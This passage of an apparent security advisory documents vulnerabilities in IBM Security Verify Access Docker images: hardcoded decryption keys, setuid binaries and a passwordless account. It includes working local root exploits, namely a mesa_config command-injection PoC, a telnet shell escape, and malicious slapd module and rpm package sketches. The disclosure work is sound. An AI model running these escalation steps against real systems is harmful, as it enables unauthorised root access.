49:5c:a1:3c:2c:a3:34:7e:17:ed:57:05:ca:7d:1b:\n e9:e1:23:29:af:4d:ab:24:5b:2f:10:8b:61:07:97:\n e3:36:a9:ba:f0:1b:d2:22:b2:ca:f5:c1:7d:ca:9c:\n 8e:61:c6:f1:c0:b4:47:e5:c0:5b:b5:a8:87:10:15:\n d1:28:fe:71:ba:fb:8e:53:ce:1b:88:51:37:a9:d6:\n 37:2a:0c:a4:c5:b2:ec:cc:0e:b9:44:3c:42:c6:a8:\n 75:61:91:8a:d4:68:26:14:b6:21:0e:8d:95:dc:13:\n a1:ee:7f:2d:74:9c:48:e8:de:70:11:c8:a9:48:a2:\n 6d:c0:f4:68:bc:aa:c7:2a:f5:78:77:47:92:59:65:\n b1:2d\n Exponent: 65537 (0x10001)\n X509v3 extensions:\n 1.3.6.1.4.999999999.999999999.999999999.718375.55524.2.5001: \n DN.T+L. 
Z..$.....6B..j.h[i.b-\"e\u003e.W...@.m...gV~.L..6..j.)F....`........H.}O4..r...KC.....\u0026bzv.D.6...5..Zx...........wq.5G......b.x}.bQ..~.......%.p.b.\u003c..P.\u003c...$76=...t....O..J.].L..2.(In.A...3...G.E..9..O.........H..U....ih....|07!6.Z6.........`.9.........=\n Signature Algorithm: sha1WithRSAEncryption\n Signature Value:\n bb:0f:22:30:06:39:08:3e:65:e7:67:a2:f7:a0:1a:96:6f:a6:\n 75:57:3e:af:b0:64:7d:83:07:47:6c:a3:ce:91:7d:11:94:b5:\n e9:f7:79:74:f0:22:ab:50:c7:49:66:5e:64:0c:63:07:b7:43:\n f2:35:52:e4:2c:cc:c0:1f:b4:ed:2f:18:cb:d3:a0:3c:3f:6d:\n 07:88:ad:b6:fe:52:2b:ea:10:0c:9c:0a:f4:04:21:20:95:e9:\n a7:39:e9:6f:f1:83:11:5e:b7:c5:d5:41:f8:d0:4b:bc:a2:d5:\n c6:1b:e0:77:f4:91:f2:1b:23:25:17:42:29:19:3e:ce:4e:39:\n 12:e5:29:30:69:6a:fe:47:ba:e6:d8:d5:5e:3c:23:c6:b5:40:\n 49:e5:64:7e:69:cc:43:e0:15:ae:f5:dc:d9:8c:27:6f:2e:09:\n 25:85:c3:f8:95:44:12:42:6f:c5:d1:e0:41:b2:f0:00:90:2c:\n ea:36:05:1d:df:f3:a3:b6:4f:42:e6:6d:f2:33:bd:9f:ae:3f:\n 18:4e:79:08:35:bc:28:15:ac:23:0e:b5:28:23:c2:08:3d:6a:\n 39:5d:37:fa:60:13:ef:19:c3:7a:9c:db:f0:19:0c:ac:0d:d0:\n 51:b1:1b:ae:22:a4:b7:92:3b:ff:61:a3:0f:1c:6e:52:97:fe:\n 2d:65:cb:13\n Modulus=EC2786245E2B89572B8337621BCA477CEA27947C8AA5449E2DD19E3409791F714A1261F19F114974BC66BF85157A74182BD1CBEC3F552E87C94CC7593B005D8B641FF71DFE363223786F5052842914FFF5038F0DC82436E5A43C40B3AFB03472E36774E6BB88FC58F1FAB336843262CA7403955F78F8A4495CA13C2CA3347E17ED5705CA7D1BE9E12329AF4DAB245B2F108B610797E336A9BAF01BD222B2CAF5C17DCA9C8E61C6F1C0B447E5C05BB5A8871015D128FE71BAFB8E53CE1B885137A9D6372A0CA4C5B2ECCC0EB9443C42C6A87561918AD4682614B6210E8D95DC13A1EE7F2D749C48E8DE7011C8A948A26DC0F468BCAAC72AF5787747925965B12D\n kali-docker# openssl rsa -in encKey.key -modulus -noout \n \n 
    Modulus=EC2786245E2B89572B8337621BCA477CEA27947C8AA5449E2DD19E3409791F714A1261F19F114974BC66BF85157A74182BD1CBEC3F552E87C94CC7593B005D8B641FF71DFE363223786F5052842914FFF5038F0DC82436E5A43C40B3AFB03472E36774E6BB88FC58F1FAB336843262CA7403955F78F8A4495CA13C2CA3347E17ED5705CA7D1BE9E12329AF4DAB245B2F108B610797E336A9BAF01BD222B2CAF5C17DCA9C8E61C6F1C0B447E5C05BB5A8871015D128FE71BAFB8E53CE1B885137A9D6372A0CA4C5B2ECCC0EB9443C42C6A87561918AD4682614B6210E8D95DC13A1EE7F2D749C48E8DE7011C8A948A26DC0F468BCAAC72AF5787747925965B12D
    kali-docker#

It is also possible to decrypt the `shadow.enc` file of a live instance using the hardcoded `device_key.kdb`:

    kali-docker# file shadow.enc
    shadow.enc: data
    kali-docker# LD_LIBRARY_PATH=/home/user/ibmcom/_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/usr/lib64:/home/user/ibmcom/_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/usr/local/ibm/gsk8_64/lib64 /home/user/ibmcom/_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/usr/sbin/isva_decrypt shadow.enc
    kali-docker# cat shadow.enc
    root:!!$6$[REDACTED]:19255:0:99999:7:::
    bin:*:18367:0:99999:7:::
    daemon:*:18367:0:99999:7:::
    adm:*:18367:0:99999:7:::
    lp:*:18367:0:99999:7:::
    sync:*:18367:0:99999:7:::
    shutdown:*:18367:0:99999:7:::
    halt:*:18367:0:99999:7:::
    mail:*:18367:0:99999:7:::
    operator:*:18367:0:99999:7:::
    games:*:18367:0:99999:7:::
    ftp:*:18367:0:99999:7:::
    nobody:*:18367:0:99999:7:::
    dbus:!!:19115::::::
    systemd-coredump:!!:19115::::::
    systemd-resolve:!!:19115::::::
    tss:!!:19115::::::
    postgres:!!:19151::::::
    ldap:!!:19151::::::
    admin:$6$[REDACTED]:19255:0:99999:7:::
    www-data:*:14251:0:99999:7:::
    ivmgr:!!:19151:0:99999:7:::
    cluster::19151:0:99999:7:::
    pgresql:!!:19151:0:99999:7:::
    nfast:!!:19151:0:99999:7:::
    tivoli:!!:19151:0:99999:7:::
    isam:!!:19151:1:90:7:::

An attacker can easily decrypt the encrypted
files inside the snapshot files. These snapshots contain an `openldap.zip` file with the OpenLDAP configuration, keytabs, passwords, SSL certificates and private keys.

The encryption mechanism, based on hardcoded keys, is ineffective and provides a false sense of security.

## Details - Local Privilege Escalation using OpenLDAP

It was observed that the official IBM Docker image ibmcom/verify-access contains a Local Privilege Escalation vulnerability.

The `slapd` binary, used to run OpenLDAP, has incorrect permissions, allowing any user to run `slapd` as root. An attacker can run `slapd` as root and specify a malicious configuration file that will execute code as root.

Using static analysis on the extracted file system, the `usr/sbin/slapd` program is owned by `root:$group` with mode `4755`:

    kali-docker# docker images
    REPOSITORY                     TAG        IMAGE ID       CREATED        SIZE
    ibmcom/verify-access-runtime   10.0.4.0   498e181d7395   3 months ago   1.07GB
    ibmcom/verify-access-wrp       10.0.4.0   c0003aca743c   3 months ago   442MB
    ibmcom/verify-access           10.0.4.0   206efdd7809c   3 months ago   1.53GB
    ibmcom/verify-access-dsc       10.0.4.0   959f6f1095e9   3 months ago   305MB

    kali-docker# ls -la _verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/usr/sbin/slapd
    -rwsr-sr-x 1 root user 1916768 Jun  8 01:30 _verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/usr/sbin/slapd

While checking on a live system, we can confirm the permissions `4755` (suid bit) are used in the verify-access instance. The owner is `root:ivmgr`:

    [isam@verify-access log]$ ls -la /usr/sbin/slapd
    -rwsr-sr-x 1 root ivmgr 1916768 Jun  8 13:30 /usr/sbin/slapd
    [isam@verify-access log]$

By default, `slapd` can load external modules (and thus execute code). These modules are described by libtool `.la` files, which reference the shared libraries that will be loaded within slapd.
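The module-loading mechanism just described can be sketched with a crafted `.la` file and a minimal slapd configuration. All paths and names below are hypothetical, and a real exploit additionally requires a crafted shared object (with a constructor) placed in the attacker-controlled directory; only the configuration files are generated here.

```shell
# Hypothetical attacker-controlled directory and module description.
mkdir -p /tmp/evil-mod

# Minimal libtool .la file pointing slapd at an attacker-owned library.
cat > /tmp/evil-mod/evil.la <<'EOF'
# evil.la - a libtool library file
dlname='evil.so.0'
library_names='evil.so.0 evil.so'
dlopen=''
dlpreopen=''
# Directory that this library needs to be installed in:
libdir='/tmp/evil-mod'
EOF

# Minimal slapd configuration loading the malicious module.
cat > /tmp/evil-mod/slapd-evil.conf <<'EOF'
modulepath /tmp/evil-mod
moduleload evil.la
EOF

# On the appliance (not executed here), the suid slapd would then
# dlopen() /tmp/evil-mod/evil.so.0 as root:
#   /usr/sbin/slapd -f /tmp/evil-mod/slapd-evil.conf
```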

Content of `/etc/openldap/slapd.conf`:

    # Load dynamic backend modules:
    # modulepath /usr/lib/openldap
    # moduleload back_bdb.la
    # moduleload back_ldap.la
    # moduleload back_ldbm.la
    # moduleload back_passwd.la
    # moduleload back_shell.la
    moduleload syncprov.la

It is possible to load a malicious module as root using a crafted `.la` configuration file, giving a local attacker a Local Privilege Escalation to root. For example, a default `.la` file can be turned into a malicious one by pointing its `libdir` option to an attacker-controlled directory:

    kali-docker# cat _verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/usr/lib64/openldap/syncprov.la
    # syncprov.la - a libtool library file
    # Generated by libtool (GNU libtool) 2.4.6
    #
    # Please DO NOT delete this file!
    # It is necessary for linking the library.

    # The name that we can dlopen(3).
    dlname='syncprov-2.4.so.2'

    # Names of this library.
    library_names='syncprov-2.4.so.2.11.4 syncprov-2.4.so.2 syncprov.so'
    [...]
    # Files to dlopen/dlpreopen
    dlopen=''
    dlpreopen=''

    # Directory that this library needs to be installed in:
    libdir='/usr/lib64/openldap'

## Details - Local Privilege Escalation using rpm

The `rpm` binary has incorrect permissions in the ibmcom/verify-access instance, allowing any user to run rpm as root.

Using static analysis on the extracted file system, the `usr/bin/rpm` program is owned by `root:root` with mode `4755`:

    kali-extraction-docker# docker images
    REPOSITORY                     TAG        IMAGE ID       CREATED        SIZE
    ibmcom/verify-access-runtime   10.0.4.0   498e181d7395   3 months ago   1.07GB
    ibmcom/verify-access-wrp       10.0.4.0   c0003aca743c   3 months ago   442MB
    ibmcom/verify-access           10.0.4.0   206efdd7809c   3 months ago   1.53GB
    ibmcom/verify-access-dsc       10.0.4.0   959f6f1095e9   3 months ago   305MB

    kali-extraction-docker# ls -la ./_verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/usr/bin/rpm
    -rwsr-sr-x 1 root root 21336 Apr  5 14:38 ./_verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/usr/bin/rpm

While checking on a live system, we can confirm the permissions `4755` (suid bit) are used in the verify-access Docker image. The file belongs to `root:root`:

    [isam@verify-access /]$ ls -la /usr/bin/rpm
    -rwsr-sr-x 1 root root 21336 Apr  6 02:38 /usr/bin/rpm
    [isam@verify-access /]$ /usr/bin/rpm
    RPM version 4.14.3
    Copyright (C) 1998-2002 - Red Hat, Inc.
    This program may be freely redistributed under the terms of the GNU GPL

    Usage: rpm [-afgpcdLAlsiv?] [-a|--all] [-f|--file] [--path] [-g|--group] [-p|--package] [--pkgid] [--hdrid] [--triggeredby] [--whatconflicts] [--whatrequires] [--whatobsoletes] [--whatprovides] [--whatrecommends]
      [--whatsuggests] [--whatsupplements] [--whatenhances] [--nomanifest] [-c|--configfiles] [-d|--docfiles] [-L|--licensefiles] [-A|--artifactfiles] [--dump] [-l|--list] [--queryformat=QUERYFORMAT] [-s|--state]
      [--nofiledigest] [--nofiles] [--nodeps] [--noscript] [--allfiles] [--allmatches] [--badreloc] [-e|--erase=<package>+] [--excludedocs] [--excludepath=<path>] [--force] [-F|--freshen=<packagefile>+] [-h|--hash]
      [--ignorearch] [--ignoreos] [--ignoresize] [--noverify] [-i|--install] [--justdb] [--nodeps] [--nofiledigest] [--nocontexts] [--nocaps] [--noorder] [--noscripts] [--notriggers] [--oldpackage] [--percent]
      [--prefix=<dir>] [--relocate=<old>=<new>] [--replacefiles] [--replacepkgs] [--test] [-U|--upgrade=<packagefile>+] [--reinstall=<packagefile>+] [-D|--define='MACRO EXPR'] [--undefine=MACRO] [-E|--eval='EXPR']
      [--target=CPU-VENDOR-OS] [--macros=<FILE:...>] [--noplugins] [--nodigest] [--nosignature] [--rcfile=<FILE:...>] [-r|--root=ROOT] [--dbpath=DIRECTORY] [--querytags] [--showrc] [--quiet] [-v|--verbose]
      [--version] [-?|--help] [--usage] [--scripts] [--setperms] [--setugids] [--setcaps] [--restore] [--conflicts] [--obsoletes] [--provides] [--requires] [--recommends] [--suggests] [--supplements]
      [--enhances] [--info] [--changelog] [--changes] [--xml] [--triggers] [--filetriggers] [--last] [--dupes] [--filesbypkg] [--fileclass] [--filecolor] [--fileprovide] [--filerequire] [--filecaps]
    [isam@verify-access /]$

An attacker can run rpm as root to add or remove any package on the system, providing full root access.
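A sketch of the attack implied above (package name, paths and payload are hypothetical): a local user builds a package whose `%post` scriptlet runs an arbitrary command, then installs it through the suid rpm binary, which executes scriptlets with the installer's privileges. Only the spec file is generated below; the build and install commands are shown as comments.

```shell
# Prepare a build tree and a spec file with a malicious %post scriptlet.
mkdir -p /tmp/poc/SPECS
cat > /tmp/poc/SPECS/evil.spec <<'EOF'
Name: evil
Version: 1.0
Release: 1
Summary: LPE PoC
License: none
BuildArch: noarch

%description
LPE PoC package.

%post
# Runs during installation, i.e. with the privileges of the suid rpm:
id > /tmp/rpm-lpe-poc

%files
EOF

# On the appliance (not executed here):
#   rpmbuild -bb --define "_topdir /tmp/poc" /tmp/poc/SPECS/evil.spec
#   /usr/bin/rpm -i --nodeps /tmp/poc/RPMS/noarch/evil-1.0-1.noarch.rpm
```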

## Details - Insecure setuid binaries and multiple Local Privilege Escalations in IBM code

It was observed that the official IBM Docker ibmcom/verify-access image contains several binaries with incorrect permissions (`4755` - suid bit, owned by `root:root` or `root:ivmgr`), allowing any local user to run these programs as root:

- /opt/PolicyDirector/bin/pdmgrd
- /opt/pdweb/bin/webseald
- /usr/bin/rpm
- /usr/sbin/slapd
- /usr/sbin/mesa_config
- /usr/sbin/mesa_cli
- /usr/sbin/mesa_control
- /usr/sbin/mesa_lcd
- /usr/sbin/mesa_stats

Binaries with the suid bit:

    [isam@verify-access]$ ls -la /usr/sbin/slapd
    -rwsr-sr-x 1 root ivmgr 1916768 Jun  8 13:30 /usr/sbin/slapd
    [isam@verify-access]$ ls -la /usr/sbin/mesa_lcd
    -rwsr-xr-x 1 root root 57240 Jun  8 13:29 /usr/sbin/mesa_lcd
    [isam@verify-access]$ ls -la /usr/sbin/mesa_control
    -rwsr-xr-x 1 root root 98448 Jun  8 13:29 /usr/sbin/mesa_control
    [isam@verify-access]$ ls -la /usr/sbin/mesa_config
    -rwsr-sr-x 1 root root 2975680 Jun  8 13:29 /usr/sbin/mesa_config
    [isam@verify-access]$ ls -la /usr/sbin/mesa_stats
    -rwsr-xr-x 1 root root 11176 Jun  8 13:13 /usr/sbin/mesa_stats
    [isam@verify-access]$ ls -la /usr/sbin/mesa_cli
    -rwsr-xr-x 1 root root 436160 Jun  8 13:29 /usr/sbin/mesa_cli
    [isam@verify-access]$ ls -la /usr/bin/rpm
    -rwsr-sr-x 1 root root 21336 Apr  6 02:38 /usr/bin/rpm
    [isam@verify-access]$ ls -la /opt/PolicyDirector/bin/pdmgrd
    -r-sr-sr-x 1 root ivmgr 32040 Jun  8 13:30 /opt/PolicyDirector/bin/pdmgrd
    [isam@verify-access]$ ls -la /opt/pdweb/bin/webseald
    -r-sr-s--- 1 root ivmgr 29296 Jun  8 13:30 /opt/pdweb/bin/webseald
    [isam@verify-access]$ ls -la /opt/dsc/bin/dscd
    -r-sr-s--- 1 ivmgr ivmgr 24264 Jun  8 13:30 /opt/dsc/bin/dscd

Four trivial Local Privilege Escalations were found using the suid bit; additional LPEs may also exist in these programs. Trivial LPEs can be found throughout the mesa_* programs.
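Such binaries are enumerated with a standard `find` invocation; the sketch below shows the audit command and then demonstrates it on a temporary directory so it is runnable anywhere.

```shell
# On the appliance, setuid/setgid files are enumerated with:
#   find / -xdev \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null
# Self-contained demonstration in a temporary directory:
demo="$(mktemp -d)"
touch "$demo/suid-demo"
chmod 4755 "$demo/suid-demo"   # set the suid bit, as on slapd/rpm/mesa_*
found="$(find "$demo" -perm -4000 -type f)"
echo "$found"
rm -rf "$demo"
```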

An attacker can obtain Local Privilege Escalation as root inside instances based on the ibmcom/verify-access image.

The code of the `mesa_*` programs contains several trivial vulnerabilities due to the use of the `MesaSystem` function (and its derivatives) found in the `libwsmesa.so` library. This function is an insecure wrapper around `execv()` that invokes `/bin/sh -c` on attacker-controlled values; the use of `/bin/sh -c` allows command injection.

[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]

## Details - Local Privilege Escalation using mesa_config - import of a new snapshot

The `mesa_config` program allows importing a new snapshot, which lets an attacker obtain a Local Privilege Escalation as root by importing a malicious snapshot:

[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]

The function `MainApplySnapshot` will install the new malicious snapshot as root:

[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]

## Details - Local Privilege Escalation using mesa_config - command injections

Exploiting the `fips_zeroize_files` option of the `mesa_config` program provides root access.
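The injection pattern can be reproduced with a minimal sketch (the wrapper name and the echoed command are hypothetical stand-ins for `MesaSystem` and the zeroize logic):

```shell
# A MesaSystem-style wrapper: the caller-supplied value is interpolated
# into a /bin/sh -c command line without sanitization.
mesa_system_sketch() {
    /bin/sh -c "echo zeroizing: $1"
}

# A ';' in the attacker-controlled argument terminates the intended
# command and starts a new one, exactly as with fips_zeroize_files.
out="$(mesa_system_sketch 'AAAA;echo INJECTED')"
echo "$out"   # prints "zeroizing: AAAA" then "INJECTED"
```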

[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]

The following PoC provides root privileges inside the current instance:

    [isam@verify-access /]$ id
    uid=6000(isam) gid=0(root) groups=0(root),55(ldap),1000(ivmgr),1007(pgresql),1009(tivoli),5000(www-data)
    [isam@verify-access /]$ cat /tmp/test.sh
    #!/bin/sh
    id > /tmp/id-2

    [isam@verify-access /]$ ls -la /tmp/id-2
    ls: cannot access '/tmp/id-2': No such file or directory
    [isam@verify-access /]$ /usr/sbin/mesa_config fips_zeroize_files "AAAAAAAAAAAAAAAAAAAAAAAA;/tmp/test.sh"
    [isam@verify-access /]$ ls -la /tmp/id-2
    -rw-rw-r-- 1 root root 102 Oct 13 21:32 /tmp/id-2
    [isam@verify-access /]$ cat /tmp/id-2
    uid=0(root) gid=0(root) groups=0(root),55(ldap),1000(ivmgr),1007(pgresql),1009(tivoli),5000(www-data)
    [isam@verify-access /]$

## Details - Local Privilege Escalation using mesa_cli - import of a new snapshot

The `mesa_cli` program is also vulnerable to a Local Privilege Escalation. This tool allows any user to manage the instance:

    [isam@verify-access]$ mesa_cli
    Welcome to the IBM Security Verify Access appliance
    Enter "help" for a list of available commands
    verify-access> help
    Current mode commands:
       diagnostics      Work with the IBM Security Verify Access diagnostics.
       extensions       List and remove extensions installed on the appliance.
       fips             View FIPS 140-2 state and events.
       fixpacks         Work with fix packs.
       isam             Work with the IBM Security Verify Access settings.
       license          Work with licenses.
       lmi              Work with the local management interface.
       lmt              Work with the license metric tool.
       management       Work with management settings.
       pending_changes  Work with the IBM Security Verify Access pending changes.
       snapshots        Work with policy snapshot files.
       support          Work with support information files.
       tools            Work with network diagnostic tools.
    Global commands:
       back             Return to the previous command mode.
       exit             Log off from the appliance.
       help             Display information for using the specified command.
       reload           Reload the container configuration.
       shutdown         End system operation and turn off the power.
       state            Display the current state of the container.
       top              Return to the top level.
    verify-access> snapshots
    verify-access:snapshots> help
    Current mode commands:
       apply            Apply a policy snapshot file to the system.
       create           Create a snapshot of current policy files.
       delete           Delete a policy snapshot file.
       get_comment      View the comment associated with a policy snapshot file.
       list             List the policy snapshot files.
       set_comment      Replace the comment associated with a policy snapshot file.
    Global commands:
       back             Return to the previous command mode.
       exit             Log off from the appliance.
       help             Display information for using the specified command.
       reload           Reload the container configuration.
       shutdown         End system operation and turn off the power.
       state            Display the current state of the container.
       top              Return to the top level.
    verify-access:snapshots> exit
    [isam@verify-access /]$

The `apply` command in the snapshots menu allows an attacker to install a new malicious snapshot as root and obtain a Local Privilege Escalation.

## Details - Local Privilege Escalation using mesa_cli - telnet escape shell

Another LPE was found using the telnet client available within `mesa_cli`: it is possible to escape the telnet client with the `^]` key sequence and get a shell as root:

    [isam@verify-access /]$ id
    uid=6000(isam) gid=0(root) groups=0(root),55(ldap),1000(ivmgr),1007(pgresql),1009(tivoli),5000(www-data)
    [isam@verify-access /]$ mesa_cli
    Welcome to the IBM Security Verify Access appliance
    Enter "help" for a list of available commands
    verify-access> tools
    verify-access:tools> telnet test-server01.lan 22
    Trying 10.0.0.14...
\n Connected to test-server01.lan. \n Escape character is \u0027^]\u0027. \n SSH-2.0-OpenSSH_8.0\n ^]\n telnet\u003e !sh\n sh-4.4# id\n uid=0(root) gid=0(root) groups=0(root),55(ldap),1000(ivmgr),1007(pgresql),1009(tivoli),5000(www-data)\n sh-4.4# touch /tmp/pwned-root\n sh-4.4# exit\n exit\n ^]\n telnet\u003e q\n Connection closed. \n verify-access:tools\u003e exit\n [isam@verify-access /]$ ls -la /tmp/pwned-root\n -rw-r--r-- 1 root root 0 Oct 13 22:21 /tmp/pwned-root\n [isam@verify-access /]$\n\nThe `sub_410330` function will `execv()` telnet through the `MesaSpawn` function:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\n\n\n## Details - Outdated OpenSSL\n\nIt was observed that all the official IBM Docker images (ibmcom/verify-access-runtime, ibmcom/verify-access-wrp, ibmcom/verify-access and ibmcom/verify-access-dsc) contain the outdated OpenSSL package openssl-1.1.1k-6.el8_5.x86_64. This package contains several vulnerabilities that were patched in August 2022. \n\nAt the time of the analysis (28 October 2022), these vulnerabilities were patched by Red Hat but the official IBM Docker images were still vulnerable. 
\n\nAnalysis of the libssl.so.1.1.1k files found in the 4 Docker images:\n\n kali-docker# sha256sum **/libssl.so.1.1.1k \n 2a92ce36e25daa330efd6f68bdd3116968a721218e446f2d5c1f73e3404acf10 _verify-access-dsc.tar/1ca1ca276c7e33ace0fc60a47ce408d95c591a7b5d68a12688d24578c82cadff/usr/lib64/libssl.so.1.1.1k\n 2a92ce36e25daa330efd6f68bdd3116968a721218e446f2d5c1f73e3404acf10 _verify-access-runtime.tar/1ca1ca276c7e33ace0fc60a47ce408d95c591a7b5d68a12688d24578c82cadff/usr/lib64/libssl.so.1.1.1k\n 2a92ce36e25daa330efd6f68bdd3116968a721218e446f2d5c1f73e3404acf10 _verify-access.tar/fc59d355e611a66e66497ba02cb950853718131f53c526f83d59de4cacd888f3/usr/lib64/libssl.so.1.1.1k\n 2a92ce36e25daa330efd6f68bdd3116968a721218e446f2d5c1f73e3404acf10 _verify-access-wrp.tar/1ca1ca276c7e33ace0fc60a47ce408d95c591a7b5d68a12688d24578c82cadff/usr/lib64/libssl.so.1.1.1k\n \n kali-docker# strings ./_verify-access.tar/fc59d355e611a66e66497ba02cb950853718131f53c526f83d59de4cacd888f3/usr/lib64/libssl.so.1.1.1k|grep 1.1.1\n OPENSSL_1_1_1\n OPENSSL_1_1_1a\n OpenSSL 1.1.1k FIPS 25 Mar 2021\n libssl.so.1.1.1k-1.1.1k-6.el8_5.x86_64.debug\n\nWe can confirm the OpenSSL version is provided by the package libssl.so.1.1.1k-1.1.1k-6.el8_5.x86_64. \n\nThe security announcement from Redhat patching vulnerabilities in the version libssl.so.1.1.1k-1.1.1k-6.el8_5.x86_64 is RHSA-2022:5818-01 (https://access.redhat.com/errata/RHSA-2022:5818). 
\n\nThe packages patching the vulnerabilities are:\n\n- - openssl-1.1.1k-7.el8_6.x86_64.rpm\n- - openssl-debuginfo-1.1.1k-7.el8_6.i686.rpm\n- - [...]\n\nWith access to live systems, we can confirm that the patches have not been applied and the systems are still vulnerable:\n\n [root@container-01]# podman ps\n CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES\n 413823e2f7d1 ibmcom/verify-access/10.0.4.0:20220926.6 4 hours ago Up 4 hours ago (healthy) 0.0.0.0:7443-\u003e9443/tcp verify-access\n a2142514d831 ibmcom/verify-access-runtime/10.0.4.0:20220926.6 4 hours ago Up 4 hours ago (healthy) 0.0.0.0:9443-\u003e9443/tcp verify-access-runtime\n e0c55b6440cf ibmcom/verify-access-dsc/10.0.4.0:20220926.6 4 hours ago Up 4 hours ago (healthy) 0.0.0.0:8443-8444-\u003e8443-8444/tcp verify-access-dsc\n [root@container-01]# for i in 413823e2f7d1 a2142514d831 e0c55b6440cf; do podman exec -it $i bash -c \u0027rpm -qa|grep -i openssl\u0027;echo;done\n openssl-1.1.1k-6.el8_5.x86_64\n openssl-libs-1.1.1k-6.el8_5.x86_64\n apr-util-openssl-1.6.1-6.el8.x86_64\n \n openssl-libs-1.1.1k-6.el8_5.x86_64\n \n openssl-libs-1.1.1k-6.el8_5.x86_64\n openssl-1.1.1k-6.el8_5.x86_64\n\n\nThe official Docker images contain known vulnerabilities. \n\n\n\n## Details - PermitRootLogin set to yes\n\nIt was observed that the configuration file `/etc/sysconfig/sshd-permitrootlogin` will allow the connection from root in the Docker images:\n\n kali-docker# find . 
| grep sshd-permitrootlogin\n ./_verify-access.tar/fc59d355e611a66e66497ba02cb950853718131f53c526f83d59de4cacd888f3/etc/sysconfig/sshd-permitrootlogin\n ./_verify-access-dsc.tar/1ca1ca276c7e33ace0fc60a47ce408d95c591a7b5d68a12688d24578c82cadff/etc/sysconfig/sshd-permitrootlogin\n ./_verify-access-runtime.tar/1ca1ca276c7e33ace0fc60a47ce408d95c591a7b5d68a12688d24578c82cadff/etc/sysconfig/sshd-permitrootlogin\n ./_verify-access-wrp.tar/1ca1ca276c7e33ace0fc60a47ce408d95c591a7b5d68a12688d24578c82cadff/etc/sysconfig/sshd-permitrootlogin\n kali-docker# cat */*/etc/sysconfig/sshd-permitrootlogin\n # This file has been generated by the Anaconda Installer. \n # Allow root to log in using ssh. Remove this file to opt-out. \n PERMITROOTLOGIN=\"-oPermitRootLogin=yes\"\n # This file has been generated by the Anaconda Installer. \n # Allow root to log in using ssh. Remove this file to opt-out. \n PERMITROOTLOGIN=\"-oPermitRootLogin=yes\"\n # This file has been generated by the Anaconda Installer. \n # Allow root to log in using ssh. Remove this file to opt-out. \n PERMITROOTLOGIN=\"-oPermitRootLogin=yes\"\n # This file has been generated by the Anaconda Installer. \n # Allow root to log in using ssh. Remove this file to opt-out. \n PERMITROOTLOGIN=\"-oPermitRootLogin=yes\"\n\nIf an SSH server were installed inside the instances, it would then be possible to log in as root. 
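A minimal hardening sketch (an assumption, not an official IBM fix): drop the generated override file, as the file's own comment suggests. The helper name and the image-root parameter are illustrative.

```shell
# Hardening sketch: delete the Anaconda-generated override so sshd no
# longer forces PermitRootLogin=yes. disable_root_login_override is an
# illustrative helper; $1 is the root of the extracted image filesystem
# ("/" inside a running container).
disable_root_login_override() {
    rm -f "$1/etc/sysconfig/sshd-permitrootlogin"
}
```

As the generated comment itself states, removing the file opts out of the forced root login.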
\n\n\n\n## Details - Lack of password for the `cluster` user\n\nIt was observed that the `cluster` user in the Docker image verify-access does not have a password defined in the `/etc/shadow` file:\n\n kali-docker# cat _verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/etc/passwd | grep cluster\n cluster:x:5003:1006::/home/cluster:/usr/sbin/wga_clustersh\n \n kali-docker# cat _verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/etc/shadow | grep cluster \n cluster::19151:0:99999:7:::\n \n kali-docker# john --show _verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/etc/shadow \n admin:admin:19151:0:99999:7:::\n cluster:NO PASSWORD:19151:0:99999:7:::\n \n 2 password hashes cracked, 0 left\n\n\nIn the live environment, it was confirmed that the user `cluster` does not have a password in the `verify-access` instance:\n\n [root@test-server 5ecd09e2d7bb10f3bec5b6be4c2298d6bdb54b70a75ce67944651b6b5330821e]# cat ./merged/etc/shadow | grep cluster\n cluster::19151:0:99999:7:::\n\nIf an SSH server were installed inside the instances, it would then be possible to log in as cluster without a password. \n\nA user with local access can get `cluster` privileges. \n\n\n\n## Details - Non-standard way of storing hashes and world-readable files containing hashes\n\nIt was observed that passwords are saved in 3 non-standard files in the Docker image verify-access:\n\n- - `/etc/shadow.isam`\n- - `/etc/admin.pwd`\n- - `/etc/wga_notifications.conf`\n\nFurthermore, the `/etc/shadow.isam` and `/etc/wga_notifications.conf` files are world-readable. 
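Passwordless entries such as the `cluster::` record above can be flagged mechanically: in a shadow-format file the second colon-separated field is the crypt hash, and an empty field means no password is required. A small audit sketch (the helper name is illustrative) that applies equally to `/etc/shadow` and `/etc/shadow.isam`:

```shell
# List accounts whose password field is empty in a shadow-format file:
# field 2 of each colon-separated record is the crypt hash, and an empty
# field (as in "cluster::19151:0:99999:7:::") means passwordless login.
list_passwordless_accounts() {
    awk -F: '$2 == "" { print $1 }' "$1"
}
```

Run against the `/etc/shadow` file extracted from the verify-access image, this would print `cluster`.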
